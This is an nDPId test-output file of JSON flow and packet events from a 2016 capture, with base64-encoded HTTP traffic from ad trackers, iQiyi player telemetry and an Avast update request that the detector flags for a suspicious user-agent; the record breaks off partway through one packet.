+00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1467353144633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1467353144633,"pkt":"ABxCjnAxTF4M6gNlCABFAAFNZb1AADAG6WZ1T1GHwKhzCABQxQsUvd5l87WhOFAYAA4qLgAASFRUUC8xLjEgMzAyIEZvdW5kDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjMzIEdNVA0KQ29udGVudC1MZW5ndGg6IDANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClNldC1Db29raWU6IFY9NjY5Mzg1MTYxNTg4NTA0OTAxMTsgRG9tYWluPW1sdDAxLmNvbTsgRXhwaXJlcz1TYXQsIDAxLUp1bC0yMDE3IDA2OjA1OjM3IEdNVDsgUGF0aD0vDQpMb2NhdGlvbjogaHR0cDovL2NtYy50YW54LmNvbS9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MQ0KDQo="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7560000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1467353144819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"thread_ts_msec":1467353144819,"pkt":"TF4M6gNlABxCjnAxCABFAAGuBX9AAIAGQAzAqHMIjM3zQMUyAFBCtQhgUXsfllAYQTeurQAAR0VUIC9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MSBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNClJlZmVyZXI6IGh0dHA6Ly9pbWFnZTEud2Vic2NhY2hlLmNvbS92b2RndWlkZS9pbWFnZXMvdGFvYmFvYWQvdGFvYmFvL3Rhb2Jhby5odG1sDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KQ29va2llOiBjbmE9L2NBSER3UTFtMndDQVhhakNGbzBCbmxmOyBjbmF1aT0xOTgzMTU5NDkzDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiBjbWMudGFueC5jb20NCg0K"} 
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7560000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1467353144913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1467353144913,"pkt":"ABxCjnAxTF4M6gNlCABFAAENPiNAACwGXAmMzfNAwKhzCABQxTJRex+WQrUJ5lAYFg2SoAAASFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBjbG9zZQ0KU2VydmVyOiBUZW5naW5lDQpUaW1pbmctQWxsb3ctT3JpZ2luOiAqDQoNCjMxDQpHSUY4OWEBAAEAkQAAAAAA\/\/\/\/\/\/\/\/AAAAIfkEAQAAAgAsAAAAAAEAAQAAAgJUAQA7DQowDQoNCg=="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7560000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00935{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1467353147705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1467353147705,"pkt":"TF4M6gNlABxCjnAxCABFAAGTCAFAAIAG5GvAqHMIymwO28UzAFD2bwdscQOwMVAYAQQLYgAAR0VUIC9jb3JlP3Q9MTUwMzI5MSZ0eXBlPXZzJnV1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mYXJlYT1PVkVSU0VBfFRXX0hpTmV0JmZyb209QlNfSGlnaCZ0bz1CU19TdGFuZGFyZCZwbGF5ZXJfc3dpdGNoX2JzX3RpbWU9NDE3MTQmYXZlcmFnZV9kb3dubG9hZF9zcGVlZF89MTU4NTE1LjIwMDAwMCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
+00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7560000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1467353147794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353147794,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FnZAADMGI9HKbA7bwKhzCABQxTNxA7Ax9m8I11AYADa2JwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7560000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01211{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1467353147927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1467353147927,"pkt":"TF4M6gNlABxCjnAxCABFAAJgCC5AAIAG43HAqHMIymwO28U0AFClUF0ecJA2DlAYAQSk3gAAR0VUIC9jb3JlP3Q9NSZhPTQmaXNmaW5pc2g9MiZ0bT03JnJhPTImdHJhPTEmcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT02JnI9NTAwNDk0NjAwJmFpZD01MDI5NTk5MDAmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9d2luZG93cyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE0NyZpc2xvY2FsPTAmYXM9ZDE5ZjY0MDQ3YjY0MWNkNmZmMDk2YjA0ZmIyYTMwYjUmdmU9M2NjMGM4ZmEzNzI2MjVlNjQxNDMxNDQ4MTZmM2U5NjgmcGU9Yzk1ZDk5MmUyOTg1NmRjODRmMmU5OTA3YTJlNGIyODImdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} 
+01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7560000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1467353148016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353148016,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kRtAADMGqSvKbA7bwKhzCABQxTRwkDYOpVBfVlAYADcrXAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7560000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1467353150114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353150114,"pkt":"TF4M6gNlABxCjnAxCABFAAOlCc1AAIAG4HzAqHMIymwO7MU1AFBQgbYWJ\/60ElAYQTeIsAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDkwNDUmc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0l
FIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} +01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7560000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1467353150272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353150272,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5A3BAADMGNsbKbA7swKhzCABQxTUn\/rQSUIG5k1AYACEwggAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1467353151975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAADZC01AAIAGRNfAqHMITeooYMU2AFCms6ewkbp6GVAYAQQ6hQAAUE9TVCAvYmMyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtZW5jDQpVc2VyLUFnZW50OiB7RDY5OTA1NEQtMTY5OS00N0QyLTlCMkItRTk2RjQzOEMxMTYwfQ0KQ29udGVudC1MZW5ndGg6IDU2NzANCkhvc3Q6IGJjdS5mZi5hdmFzdC5jb20NCg0K"} 
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}} +02163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1467353151975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC05AAIAGQJvAqHMITeooYMU2AFCms6hhkbp6GVAQAQSchQAAfQmTpyjixsOwP21FM2w\/ULoWwCiRrGBztIvpkusTbkEbT7JRm749XrUdCj1kKEvBT\/wTVkKLufbjw1lE2fa\/UtfZqs8TT1sk5wEGF4kYfIBf8IaB+OB99fNQgj9Vf1WdVn6TWCfKWR8\/tOS1RKXEgVzfK9erxE3KK+nwydrin0EcycTdDVWiVtuMe6+NSVWZ\/hX990m9djhmhk3Y\/4CbzK44FcPuMMFEvf5FVV6Oh2IVmfsf\/HyiZyDsblCwMFxZeIENUdwKFZahHZX4t2m+0Z8nqx5GXJvlYlyBEV3d0wnwacDVs7VGlTeQSPCThjPgIK8C3+Vm\/SkQMbSbjQQCR56leCZ3zx0zWA16oy\/HwboJXydgKpLLIsIb296bgz9PD0n73r5JevLp9zMQqDnUQH7bGAIZpCoRWg6yOqztL9wx8O8w7fULoBoHntXDNfSIf8aFHnKtztY0xF\/96mqnymFN1wqAbHV11hLYYhYABZBRKOYh4GvMJKN2EaePTJX1g69akJ5Coj\/WAxsj0dEvDR\/vazeiKPax6X0XCpj5u6F0enF2pgEO1DTDpJi4uqvsm4AG7RZTr9WzwZ511f
H70pdVZhvHAHeLJEQhK3oT2d6qVMypkVqz3M6P1FXtaWt6+1gJ1EA+POfXctGwSFaJ2WZGwODsWtngLfTDrHYAa++DuvVvAXrC2fFJrQkArXUNzp3jB4yvJRX9IfGTljC134RtjqrqbfWIsHFlGJEvMl6y8wFPjh0U9nAnPPQHSvBi4P8rwzQhP8lZJWbdcGMeiQgoqjzlwL1JkK4Z+B\/r9S3cXUR8rrHDij9ETvqsfuOaaaj2os8zFQDB8g7oYE5htEg8jLGOrgDB+UxAsTk63FA\/Jq1qLQHIt5T87bux2F3Z6\/NtrKJ6XYTsiyX+gxtG9H+42iLcG1kZ\/aUAi1jpTBvtNKfvz8CwqOqNqLU20IAIOBemooRjwRmnBDY3f6aUMeS+wFWlvE\/51CwA1+ifJ60PDvUC79ewXAaFTKMKjf0aaHbyL5CorfEgQAN7IeqBZ06UIaZ6vzz7AgQaAmx6+Ba5qOjoaqoz\/AZLRtOM5g9J99\/JqcSZWau6dqbzwSi9lHTkFpydYtcaUiasMFbnGv1qCDetlZciKtaHoyXbLcLDtNVUeS+HOrUzQyYK2h4whXgFAMDp8Qgu77GMRNBVQqzQrQHNXcQsTRb6ToCJRD0mhPHF56bxN+TcgS8+LJg2hXeTQJGeN4XVvZl+\/NwXCMoOTGaegW++r9Spf9MH6Q7pxuozLc8xjGZ4BotpQroHGQdbg1euShz6cj4v+w35bhHqsX2WqI17RldQkIoRivoqIWQBzpBtvyVToKzr4w1pfcU7KlWiZF6wXXPmeAndVoYy0RAdjUny0dy7q\/aodxD7\/IpKex\/VPNqhV606AtQnAV2BIj+BMksKx18fv+MTvBJVqBMbMlNv\/dfX4KuK9dxD\/j5nlJb1fFCWJ+mUJw+9FKSt1DG2gs0a3nU5wTbq1xdLsklg3Akuz9T9GOR2bt29bGI8qPpXY4FyhIeC9WH4\/TgMEDv9wfb4n6lndgz9I\/9vnUXWZxcDVa2twnV4LY8xc0KQum7e2YlcthsPm+N4Sl\/nQbs4298fPcsHdqZxtg1t+yz4aZA3Jpe+9\/ltbgGRFyN2OyRh7w7lbrWs"} 
+02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1467353152282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353152282,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC5NAAIAGQFbAqHMITeooYMU2AFCms61Nkbp6GVAQAQTfHQAAbLkOCKU4wj\/evx8imwONGRNDCRNcxEbrXP8hhP5gS61xcdF\/9QCewJiAs88\/dsvrtuhb3rfKKfW889MM5i42wXGEV9fB6Oxnr9wNq+2BhBuurBIHxqXRfAAEoidfx5NjtSMkojiYfAgpgjXDepNqnYPmOEFYHjyOyZguAfDLSM7WCkcWflClhfDaN8J2wfLC\/MPix0DO7IQYMANuOzdnO3SsyyWTTBGHWAEilJLD4tHtNv5RXPXVzcDFv\/ZarQ8dpVXt06BE7M0zlIZna\/IAgdCvI6q5WBZEc\/DK1bc+szeRLHeTn9hb3LwIm5n4j6dH8WghVh4s\/faOqc4OH+pUVO\/YE9fpSsBUVYngldbrHRI5VyRGxL9aOSsPtS4AFeevGJhVzhN4cUWAnUrThdi80PfSu8tNoh7a5szE8bOfyFSl1J5U7dmSuzwsTd1O2VTTA6KkfW80J9853vrsBHj4FYhAgrfCc+AwKx842BJ5tAqCj0sllv5X87h05vAIn5jnPfuPTQZHDGSZF2ChAwxTMJDdvR6z9YqImCWEyGrlX5kVoRgmxMOXn9xgYST7BNbiKdlZJF63+s1OXqQANdKPZK9Tj+vw5aEt8npdIxi659XlE7GbPxGSGQAHioYprIcBMeXfKSeoFXi6v3GiDBYEY44c+YWn+u5dOrxPQy5gu98V\/bpgMgXufFfUvDeO83MuZBryxxpxRtKyO19btTWCUF4PY4vFOsUlEu5wupC5QJDHjSI5JBPnNgSjAFFlHl+H48KJmALxOWkXAjw7wfJ7i0t\/VAJjqzl7KEymLhTMovEkDd8M5KH4L7bM1Pk5SNL44CnPTt0uJC5bu5Y0nC5WeJ5o8FAU+zDySeyFlAKIjVubfBhsfH6iYELuT6bM366CZ2JChIMXy77eZ2ogebEDmfXuAZrshdW456rcGFtnXh7J5hHvVDP3AMs6IVf8LUWSqi6N9+RmH\/KbTYzdQuJb03F7\/k5dx4g2yWo3fs+Lr5JRUf5t\/vLHgHitgjVHiyfZxFryJ2gxO3j2J3Cy8+3iOyUtI4v3PFchrsaNap7PQFpuFhS4kHaW1nfHocLobHPOFLIJLaEq2Z3VJqsMiOW